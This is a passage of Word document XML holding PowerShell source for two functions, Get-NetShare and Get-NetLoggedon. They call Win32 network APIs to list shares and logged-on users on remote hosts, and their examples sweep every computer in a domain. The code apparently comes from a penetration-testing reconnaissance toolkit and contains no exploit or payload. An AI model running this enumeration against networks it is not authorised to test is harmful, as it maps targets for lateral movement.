      </w:r>
    </w:p>
    <w:p w14:paraId="45CAC75A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0F4E977F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .OUTPUTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5516A7C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="612F1917" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        SHARE_INFO_1 structure. A representation of the SHARE_INFO_1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E2701A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        result structure which includes the name and note for each share,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F3931A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        with the ComputerName added.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765F175F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="391089EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A883106" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="65CD8A8B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetShare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1948EEC2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1DFC5069" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns active shares on the local host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A58E01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3145AF9B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596E8EDF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="016BD862" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetShare -ComputerName sqlserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2158D323" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="67A8ADA5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns active shares on the 'sqlserver' host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1A86AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0DAD29B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4724F710" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="70270E81" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetComputer | Get-NetShare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25646812" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="17F94219" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns all shares for all computers in the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50697E77" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7A257CB5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2E3806" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0727F2DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229C89A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A58F007" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="70FD371F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D38A6C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41623C1D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A903FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostName')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0B10DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Object[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06922C21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B3928E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName = 'localhost'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740A1DA3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431FDE11" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="389702B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # extract the computer name from whatever object was passed on the pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1450572A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Computer = $ComputerName | Get-NameField</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692CA592" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="70D8BE88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # arguments for NetShareEnum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46126835" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $QueryLevel = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B349C62" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $PtrInfo = [IntPtr]::Zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C60415B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $EntriesRead = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B80D29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $TotalRead = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DDB436" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ResumeHandle = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12575F0D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3CE62A9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # get the share information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FDF8BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Result = $Netapi32::NetShareEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3C68D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6E8ED572" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # Locate the offset of the initial intPtr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789F726B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    $Offset = $PtrInfo.ToInt64()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F56464" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3C190AFF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # 0 = success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C7BB18" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if (($Result -eq 0) -and ($Offset -gt 0)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3461551F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="150B5218" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # Work out how much to increment the pointer by finding out the size of the structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E590F4C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Increment = $SHARE_INFO_1::GetSize()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ACD9BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2729D658" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # parse all the result structures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B10A7AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for ($i = 0; ($i -lt $EntriesRead); $i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FCF95B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # create a new int ptr at the given offset and cast the pointer as our result structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF6CE4F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065573A9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Info = $NewIntPtr -as $SHARE_INFO_1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1742CE66" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="78F4D4C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # return all the sections of the structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6393B932" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Shares = $Info | Select-Object *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3534AA60" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Shares | Add-Member Noteproperty 'ComputerName' $Computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4078FE57" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Offset = $NewIntPtr.ToInt64()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC224CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Offset += $Increment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0A941B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E09C2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD3AE42" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="15D0D9E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # free up the result buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0843D759" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Null = $Netapi32::NetApiBufferFree($PtrInfo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA92ACE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDBE086" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07415DA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B2BBDD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DDF236" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA1F53C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1949BCC4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3CDB66FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-NetLoggedon {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480B1C87" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D52435A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EECB82" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6F01FEC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This function will execute the NetWkstaUserEnum Win32API call to query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A984694" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        a given host for actively logged on users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED8626B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4E44AE16" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD76EB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="52BF2B76" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The hostname to query for logged on users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF32490" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2CCE61DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .OUTPUTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048CFB95" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2F9C419F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        WKSTA_USER_INFO_1 structure. A representation of the WKSTA_USER_INFO_1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188E36F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        result structure which includes the username and domain of logged on users,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DFA981" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        with the ComputerName added.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7976726E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5010EB7C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3426C1E6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4DE963D4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetLoggedon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA79C9A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="722F7897" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns users actively logged onto the local host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22321EFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="77DB7333" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DF5A92" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6BA2745E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetLoggedon -ComputerName sqlserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5257387A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="771E83BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        Returns users actively logged onto the 'sqlserver' host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B13803" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="71BEAE38" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2E8019" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="01F50C56" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetComputer | Get-NetLoggedon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E6FD22" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2889DC8B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns all logged on userse for all computers in the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDE8D26" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="33D9BDAD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434E6BA4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="32844B98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1854D7F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EDFF18" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A5FDF77" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0C7DFF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494A6818" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46882CFF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostName')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71330907" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Object[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEE3BF1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477E63B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName = 'localhost'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C360A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205FE154" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="19541442" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # extract the computer name from whatever object was passed on the pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4999D90E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Computer = $ComputerName | Get-NameField</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E28C6F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D654273" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # Declare the reference variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B31E60" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $QueryLevel = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A13898" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
